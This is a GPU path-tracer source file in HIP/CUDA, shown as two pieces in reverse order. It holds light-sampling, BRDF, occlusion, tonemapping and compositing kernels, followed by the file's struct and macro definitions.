((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } float mis = MIS(sun_pdf, brdf_pdf); ray_state[RS_SUN_R] = old_throughput[0] * (sun_color[0] / NOT_ZERO(sun_pdf)) * brdf_color[0] * mis; ray_state[RS_SUN_G] = old_throughput[1] * (sun_color[1] / NOT_ZERO(sun_pdf)) * brdf_color[1] * mis; ray_state[RS_SUN_B] = old_throughput[2] * (sun_color[2] / NOT_ZERO(sun_pdf)) * brdf_color[2] * mis; } } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float emitter_d[3]; emitter_d[0] = FLT_MAX; if (emitter_count > 0) { float emitter_uv_sample[2]; PRNG(global_id, b_seeds_2.z, emitter_uv_sample[0]); PRNG(global_id, b_seeds_2.w, emitter_uv_sample[1]); if ((emitter_uv_sample[0] + emitter_uv_sample[1]) >= 1.0f) { emitter_uv_sample[0] = 1.0f - emitter_uv_sample[0]; emitter_uv_sample[1] = 1.0f - emitter_uv_sample[1]; } float emit_u = emitter_uv_sample[0]; float emit_v = emitter_uv_sample[1]; float emit_w = 1.0f - emit_u - emit_v; float emitter_sample; PRNG(global_id, b_seeds_3.x, emitter_sample); uint emitter_choice = emitter_sample * emitter_count; EmitterIndex emitter_index = emitters[emitter_choice]; uint32_t emitter_tri_index = emitter_index.mesh_triangle_offset + emitter_index.triangle_offset; uint32_t tri_pixel = emitter_tri_index * 42; float emitter_position[3]; if (use_triangles_image) { emitter_position[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1)); emitter_position[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1)); emitter_position[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2)); } else { emitter_position[0] = triangles[emitter_tri_index].vertex[0] + (emit_u * triangles[emitter_tri_index].edges[0][0]) + (emit_v * -triangles[emitter_tri_index].edges[1][0]); emitter_position[1] = triangles[emitter_tri_index].vertex[1] + (emit_u * triangles[emitter_tri_index].edges[0][1]) + (emit_v * -triangles[emitter_tri_index].edges[1][1]); emitter_position[2] = triangles[emitter_tri_index].vertex[2] + (emit_u * triangles[emitter_tri_index].edges[0][2]) + (emit_v * -triangles[emitter_tri_index].edges[1][2]); } emitter_d[0] = emitter_position[0] - o[0]; emitter_d[1] = emitter_position[1] - o[1]; emitter_d[2] = emitter_position[2] - o[2]; float t_2 = DOT(emitter_d, emitter_d); float t = sqrt(t_2); ray_state[RS_EMITTER_T] = t; float inv_t = 1.0f / t; emitter_d[0] *= inv_t; emitter_d[1] *= inv_t; emitter_d[2] *= inv_t; float emitter_n[3]; float inverse_area; uint mat_id; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); emitter_n[0] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2); emitter_n[1] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); emitter_n[2] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[emitter_tri_index].material_id; inverse_area = triangles[emitter_tri_index].inverse_area; emitter_n[0] = emit_w * triangles[emitter_tri_index].vertex_normals[0][0] + emit_u * triangles[emitter_tri_index].vertex_normals[1][0] + emit_v * triangles[emitter_tri_index].vertex_normals[2][0]; emitter_n[1] = emit_w * triangles[emitter_tri_index].vertex_normals[0][1] + emit_u * triangles[emitter_tri_index].vertex_normals[1][1] + emit_v * triangles[emitter_tri_index].vertex_normals[2][1]; emitter_n[2] = emit_w * triangles[emitter_tri_index].vertex_normals[0][2] + emit_u * triangles[emitter_tri_index].vertex_normals[1][2] + emit_v * triangles[emitter_tri_index].vertex_normals[2][2]; } NORMALIZE(emitter_n); float cos_at_emitter = DOT(-emitter_d, emitter_n); float cos_at_tri = DOT(emitter_d, n); if ((cos_at_emitter <= 0.0f) || (cos_at_tri <= 0.0f) || (t_2 < (HI_EPSILON * 4.0f))) { emitter_d[0] = FLT_MAX; } else { float brdf_color[3]; float brdf_pdf; float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(cos_at_emitter)) * emitter_prob; float intensity = materials[mat_id].emission * 25.0f; float emitter_color[3]; float uv[2]; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; if (use_triangles_image) { emission_uv.x = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2); emission_uv.y = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); } else { emission_uv.x = emit_w * triangles[emitter_tri_index].vertex_uvs[0][0] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][0] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][0]; emission_uv.y = emit_w * triangles[emitter_tri_index].vertex_uvs[0][1] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][1] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][1]; } emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] * intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } if (fmax(fmax(emitter_color[0], emitter_color[1]), emitter_color[2]) > 0.0f) { emitter_color[0] /= emitter_pdf; emitter_color[1] /= emitter_pdf; emitter_color[2] /= emitter_pdf; float ld_o[3]; RELATIVE_TO_BASIS(emitter_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = (ld_i[2] * ld_o[2]) <= 0.0f; if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { emitter_d[0] = FLT_MAX; } } } else { emitter_d[0] = FLT_MAX; } float mis = MIS(emitter_pdf, brdf_pdf); ray_state[RS_EMITTER_R] = old_throughput[0] * emitter_color[0] * brdf_color[0] * mis; ray_state[RS_EMITTER_G] = old_throughput[1] * emitter_color[1] * brdf_color[1] * mis; ray_state[RS_EMITTER_B] = old_throughput[2] * emitter_color[2] * brdf_color[2] * mis; } } ray_state[RS_SUN_D_X] = sun_d[0]; ray_state[RS_SUN_D_Y] = sun_d[1]; ray_state[RS_SUN_D_Z] = sun_d[2]; ray_state[RS_EMITTER_D_X] = emitter_d[0]; ray_state[RS_EMITTER_D_Y] = emitter_d[1]; ray_state[RS_EMITTER_D_Z] = emitter_d[2]; } /// __global__ void NEE(float* ray_state, Material* materials, int32_t use_nodes_image, hipTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float sun_d[3]; sun_d[0] = ray_state[RS_SUN_D_X]; if (sun_d[0] < FLT_MAX) { sun_d[1] = ray_state[RS_SUN_D_Y]; sun_d[2] = ray_state[RS_SUN_D_Z]; float sun_o[3]; sun_o[0] = o[0] + (sun_d[0] * EPSILON); sun_o[1] = o[1] + (sun_d[1] * EPSILON); sun_o[2] = o[2] + (sun_d[2] * EPSILON); float h_t = FLT_MAX; OCCLUSION(sun_o, sun_d, use_nodes_image, use_triangles_image); if (h_t == FLT_MAX) { ray_state[RS_COLOR_R] += ray_state[RS_SUN_R]; ray_state[RS_COLOR_G] += ray_state[RS_SUN_G]; ray_state[RS_COLOR_B] += ray_state[RS_SUN_B]; } } float emitter_d[3]; emitter_d[0] = ray_state[RS_EMITTER_D_X]; if (emitter_d[0] < FLT_MAX) { emitter_d[1] = ray_state[RS_EMITTER_D_Y]; emitter_d[2] = ray_state[RS_EMITTER_D_Z]; float emitter_o[3]; emitter_o[0] = o[0] + (emitter_d[0] * EPSILON); emitter_o[1] = o[1] + (emitter_d[1] * EPSILON); emitter_o[2] = o[2] + (emitter_d[2] * EPSILON); float emitter_t = ray_state[RS_EMITTER_T] - (2.0f * EPSILON); float h_t = emitter_t; OCCLUSION(emitter_o, emitter_d, use_nodes_image, use_triangles_image); if (h_t == emitter_t) { ray_state[RS_COLOR_R] += ray_state[RS_EMITTER_R]; ray_state[RS_COLOR_G] += ray_state[RS_EMITTER_G]; ray_state[RS_COLOR_B] += ray_state[RS_EMITTER_B]; } } float throughput[3]; throughput[0] = ray_state[RS_THROUGHPUT_R]; throughput[1] = ray_state[RS_THROUGHPUT_G]; throughput[2] = ray_state[RS_THROUGHPUT_B]; float tp = fmax(fmax(throughput[0], throughput[1]), throughput[2]); if (tp <= THROUGHPUT_THRESHOLD) { ray_state[RS_STATE] = STATE_END; } else { float roulette_prob = tp; if (roulette_prob <= 1.0f) { float roulette; PRNG(global_id, b_seeds.z, roulette); if (roulette < roulette_prob) { float modify_throughput = 1.0f / roulette_prob; ray_state[RS_THROUGHPUT_R] = throughput[0] * modify_throughput; ray_state[RS_THROUGHPUT_G] = throughput[1] * modify_throughput; ray_state[RS_THROUGHPUT_B] = throughput[2] * modify_throughput; } else { ray_state[RS_STATE] = STATE_END; } } } } /// __global__ void Accumulate(float* ray_state, hipSurfaceObject_t target, ImageProperties image_properties, int32_t width, int32_t height, float inv_sample_count) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float rgb[3]; rgb[0] = ray_state[RS_COLOR_R]; rgb[1] = ray_state[RS_COLOR_G]; rgb[2] = ray_state[RS_COLOR_B]; AVG_TONEMAP(rgb); float lum_coeff[3]; lum_coeff[0] = 0.2125f; lum_coeff[1] = 0.7154f; lum_coeff[2] = 0.0721f; float bright_rgb[3]; bright_rgb[0] = rgb[0] * image_properties.brightness; bright_rgb[1] = rgb[1] * image_properties.brightness; bright_rgb[2] = rgb[2] * image_properties.brightness; float intensity = DOT(bright_rgb, lum_coeff); float sat_color[3]; sat_color[0] = lerp(intensity, bright_rgb[0], image_properties.saturation); sat_color[1] = lerp(intensity, bright_rgb[1], image_properties.saturation); sat_color[2] = lerp(intensity, bright_rgb[2], image_properties.saturation); rgb[0] = lerp(0.5f, sat_color[0], image_properties.contrast); rgb[1] = lerp(0.5f, sat_color[1], image_properties.contrast); rgb[2] = lerp(0.5f, sat_color[2], image_properties.contrast); uchar4 target_color = make_uchar4(saturate(rgb[0]) * 255.0f, saturate(rgb[1]) * 255.0f, saturate(rgb[2]) * 255.0f, 255); int32_t x = global_id % width; int32_t y = global_id / width; surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeTwo(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 color = (c0 + c1) / make_uint4(2); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeThree(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipTextureObject_t compositing_target_three, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 color = (c0 + c1 + c2) / make_uint4(3); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeFour(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipTextureObject_t compositing_target_three, hipTextureObject_t compositing_target_four, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 color = (c0 + c1 + c2 + c3) / make_uint4(4); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeFive(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipTextureObject_t compositing_target_three, hipTextureObject_t compositing_target_four, hipTextureObject_t compositing_target_five, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 c4 = make_uint4(tex2D<uchar4>(compositing_target_five, x, y)); uint4 color = (c0 + c1 + c2 + c3 + c4) / make_uint4(5); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } }
edeabfd7a613e9eaf6a420a69b425f51352b9c96.cu
#include <cstdio> #include <cstdint> #include <cfloat> #include "helper_math.cu.h" /// extern "C" { /// typedef struct TreeTriangle { float vertex[3]; float edges[2][3]; float vertex_normals[3][3]; float vertex_tangents[3][4]; float vertex_uvs[3][2]; float surface_normal[3]; float inverse_area; uint32_t material_id; uint32_t pad; } TreeTriangle; /// #define TRI_VERTEX (tri_pixel) #define TRI_EDGES_0 (tri_pixel + 3) #define TRI_EDGES_1 (tri_pixel + 6) #define TRI_VN_0 (tri_pixel + 9) #define TRI_VN_1 (tri_pixel + 12) #define TRI_VN_2 (tri_pixel + 15) #define TRI_VT_0 (tri_pixel + 18) #define TRI_VT_1 (tri_pixel + 22) #define TRI_VT_2 (tri_pixel + 26) #define TRI_UV_0 (tri_pixel + 30) #define TRI_UV_1 (tri_pixel + 32) #define TRI_UV_2 (tri_pixel + 34) #define TRI_SURF_N (tri_pixel + 36) #define TRI_INV_AREA (tri_pixel + 39) #define TRI_MAT_ID (tri_pixel + 40) /// /* typedef struct FourNode { uint32_t child[4]; uint32_t extra[2]; float ll_bounds[6]; float lr_bounds[6]; float rl_bounds[6]; float rr_bounds[6]; float padding[2]; } FourNode; /// #define NODE_LL (node_pixel + 0) #define NODE_LR (node_pixel + 1) #define NODE_RL (node_pixel + 2) #define NODE_RR (node_pixel + 3) #define NODE_EXTRA_0 (node_pixel + 4) #define NODE_EXTRA_1 (node_pixel + 5) #define NODE_LL_BOUNDS (node_pixel + 6) #define NODE_LR_BOUNDS (node_pixel + 12) #define NODE_RL_BOUNDS (node_pixel + 18) #define NODE_RR_BOUNDS (node_pixel + 24) */ /// typedef struct TwoNode { uint32_t child[2]; uint32_t extra[2]; float l_bounds[6]; float r_bounds[6]; } TwoNode; /// #define NODE_L (node_pixel + 0) #define NODE_R (node_pixel + 1) #define NODE_EXTRA_0 (node_pixel + 2) #define NODE_EXTRA_1 (node_pixel + 3) #define NODE_L_BOUNDS (node_pixel + 4) #define NODE_R_BOUNDS (node_pixel + 10) /// typedef struct Camera { float aperture_size; float focal_depth; float transform[16]; float root_pixel[2]; float pixel_offset[2]; float image_plane_distance; float padding; } Camera; /// typedef struct Material { uint32_t map_flags; int32_t double_sided; float albedo[4]; float metallic; float smoothness; float glass; float emission; float albedo_bounds[4]; float normal_bounds[4]; float metallic_bounds[4]; float emission_bounds[4]; } Material; /// typedef struct Sun { float direction[4]; float sun_intensity; float sky_intensity; float color[4]; } Sun; /// typedef struct EnvironmentProperties { float intensity; float rotation; } EnvironmentProperties; /// typedef struct EmitterIndex { uint mesh_triangle_offset; uint triangle_offset; } EmitterIndex; /// typedef struct PortalIndex { uint mesh_triangle_offset; uint triangle_offset; } PortalIndex; /// typedef struct ImageProperties { int tonemap; float gamma; float exposure; float contrast; float saturation; float brightness; } ImageProperties; /// #define TREE_LEAF_TRIANGLE_FACTOR 3 /// #define HM_TEST_NODES 0x0 #define HM_LEFT 0x2 #define HM_RIGHT 0x1 #define HM_BOTH 0x3 /// #define LB_NEW_SUB_TREE 0xFFFFFFFF /// #define TREE_LEAF 0x80000000 #define TREE_LEAF_MASK 0x7FFFFFFF #define TREE_SUB_TREE 0x40000000 #define TREE_SUB_TREE_MASK 0x3FFFFFFF #define TREE_TRAIL_END 0x7FFFFFFF #define TREE_NO_LEAF_HIT 0xFFFFFFFF #define NO_TRI_HIT INT_MAX /// #define DOUBLE_SIDED_FLAG 0x80000000 #define DOUBLE_SIDED_MASK 0x7FFFFFFF /// #define THROUGHPUT_THRESHOLD 0.05f /// #define DIRAC_PDF FLT_MAX /// #define MAP_FLAG_ALBEDO 0x1 #define MAP_FLAG_NORMAL 0x2 #define MAP_FLAG_METALLIC 0x4 #define MAP_FLAG_EMISSION 0x8 /// #define SUN_COS_THETA 0.9996f /// #define STATE_ENVIRONMENT 0x0 #define STATE_EMISSIVE 0x1 #define STATE_MATERIAL 0x2 #define STATE_SECONDARY 0x3 #define STATE_END 0x4 /// #define RS_STATE (ray_count * 0 + global_id) #define RS_ORIGIN_X (ray_count * 1 + global_id) #define RS_ORIGIN_Y (ray_count * 2 + global_id) #define RS_ORIGIN_Z (ray_count * 3 + global_id) #define RS_DIR_X (ray_count * 4 + global_id) #define RS_DIR_Y (ray_count * 5 + global_id) #define RS_DIR_Z (ray_count * 6 + global_id) #define RS_U (ray_count * 7 + global_id) #define RS_V (ray_count * 8 + global_id) #define RS_HIT_DISTANCE (ray_count * 9 + global_id) #define RS_TRI_INDEX (ray_count * 10 + global_id) #define RS_LAST_BRDF_PDF (ray_count * 11 + global_id) #define RS_THROUGHPUT_R (ray_count * 12 + global_id) #define RS_THROUGHPUT_G (ray_count * 13 + global_id) #define RS_THROUGHPUT_B (ray_count * 14 + global_id) #define RS_COLOR_R (ray_count * 15 + global_id) #define RS_COLOR_G (ray_count * 16 + global_id) #define RS_COLOR_B (ray_count * 17 + global_id) #define RS_SUN_D_X (ray_count * 18 + global_id) #define RS_SUN_D_Y (ray_count * 19 + global_id) #define RS_SUN_D_Z (ray_count * 20 + global_id) #define RS_SUN_R (ray_count * 21 + global_id) #define RS_SUN_G (ray_count * 22 + global_id) #define RS_SUN_B (ray_count * 23 + global_id) #define RS_EMITTER_D_X (ray_count * 24 + global_id) #define RS_EMITTER_D_Y (ray_count * 25 + global_id) #define RS_EMITTER_D_Z (ray_count * 26 + global_id) #define RS_EMITTER_T (ray_count * 27 + global_id) #define RS_EMITTER_R (ray_count * 28 + global_id) #define RS_EMITTER_G (ray_count * 29 + global_id) #define RS_EMITTER_B (ray_count * 30 + global_id) #define RS_PORTAL_D_X (ray_count * 31 + global_id) #define RS_PORTAL_D_Y (ray_count * 32 + global_id) #define RS_PORTAL_D_Z (ray_count * 33 + global_id) #define RS_PORTAL_R (ray_count * 34 + global_id) #define RS_PORTAL_G (ray_count * 35 + global_id) #define RS_PORTAL_B (ray_count * 36 + global_id) /// #define GET_GLOBAL_ID() \ ((blockIdx.y * gridDim.x + blockIdx.x) * \ (blockDim.x * blockDim.y) + \ (threadIdx.y * blockDim.x + threadIdx.x)) /// #define HI_EPSILON 0.01f #define EPSILON 0.0001f #define LO_EPSILON 0.000001f #define PI 3.14159265359f #define INV_PI 0.31830988618f #define TAU 6.28318530718f #define INV_TAU 0.15915494309 /// #define PRNG(P, SEED, R) \ { \ uint hash = SEED; \ hash ^= P; \ hash += (hash << 10); \ hash ^= (hash >> 6); \ hash += (hash << 3); \ hash ^= (hash >> 11); \ hash += (hash << 15); \ hash ^= hash >> 16; \ hash *= 0x85EBCA6B; \ hash ^= hash >> 13; \ hash *= 0xC2B2AE35; \ hash ^= hash >> 16; \ hash &= 0x007FFFFFu; \ hash |= 0x3F800000u; \ R = *((float*)&hash) - 1.0f; \ R = fmax(EPSILON, R); \ } /// #define TRANSFORM_X(P, MAT, R) { \ R[0] = P[0] * MAT[0] + P[1] * MAT[4] + P[2] * MAT[8] + MAT[12]; \ } #define TRANSFORM_Y(P, MAT, R) { \ R[1] = P[0] * MAT[1] + P[1] * MAT[5] + P[2] * MAT[9] + MAT[13]; \ } #define TRANSFORM_Z(P, MAT, R) { \ R[2] = P[0] * MAT[2] + P[1] * MAT[6] + P[2] * MAT[10] + MAT[14]; \ } #define TRANSFORM_W(P, MAT, R) { \ R[3] = P[0] * MAT[3] + P[1] * MAT[7] + P[2] * MAT[11] + MAT[15]; \ } /// #define DOT(A, B) (A[0] * B[0] + A[1] * B[1] + A[2] * B[2]) /// #define CROSS(A, B, C) { \ C[0] = A[1] * B[2] - A[2] * B[1]; \ C[1] = A[2] * B[0] - A[0] * B[2]; \ C[2] = A[0] * B[1] - A[1] * B[0]; \ } /// #define NOT_ZERO(A) copysignf(fmax(LO_EPSILON, fabs(A)), (A)) /// #define NORMALIZE(V) \ { \ float length = sqrt(V[0] * V[0] + V[1] * V[1] + V[2] * V[2]); \ float inv_length = 1.0f / NOT_ZERO(length); \ V[0] *= inv_length; \ V[1] *= inv_length; \ V[2] *= inv_length; \ } /// #define GGX_SAMPLE(D_I, ROUGHNESS, RXF, RYF, N) \ { \ float stretched[3]; \ stretched[0] = ROUGHNESS[0] * D_I[0]; \ stretched[1] = ROUGHNESS[1] * D_I[1]; \ stretched[2] = D_I[2]; \ NORMALIZE(stretched); \ float up[3]; \ up[0] = 0.0f; \ up[1] = 0.0f; \ up[2] = 1.0f; \ float t1[3]; \ CROSS(stretched, up, t1); \ if (stretched[2] < 0.9999f) { \ NORMALIZE(t1); \ } else { \ t1[0] = 1.0f; \ t1[1] = 0.0f; \ t1[2] = 0.0f; \ } \ float t2[3]; \ CROSS(t1, stretched, t2); \ float a = 1.0f / (1.0f + stretched[2]); \ float r = sqrt(RXF); \ float phi = (RYF < a) ? RYF / a * PI : PI + (RYF - a) / (1.0f - a) * PI; \ float p1 = r * cos(phi); \ float p2 = r * sin(phi) * ((RYF < a) ? 1.0f : stretched[2]); \ N[0] = ROUGHNESS[0] * \ (p1 * t1[0] + p2 * t2[0] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[0]); \ N[1] = ROUGHNESS[1] * \ (p1 * t1[1] + p2 * t2[1] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[1]); \ N[2] = (p1 * t1[2] + p2 * t2[2] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[2]); \ NORMALIZE(N); \ } /// #define TAN_THETA(V, T) \ { \ float temp = 1.0f - V[2] * V[2]; \ if (temp <= 0.0f) { \ T = 0.0f; \ } else { \ T = sqrt(temp) / V[2]; \ } \ } /// #define SIN_THETA_2(V, T) \ { \ T = 1.0f - V[2] * V[2]; \ } /// #define PROJECT_ROUGHNESS(V, ROUGHNESS, R) \ { 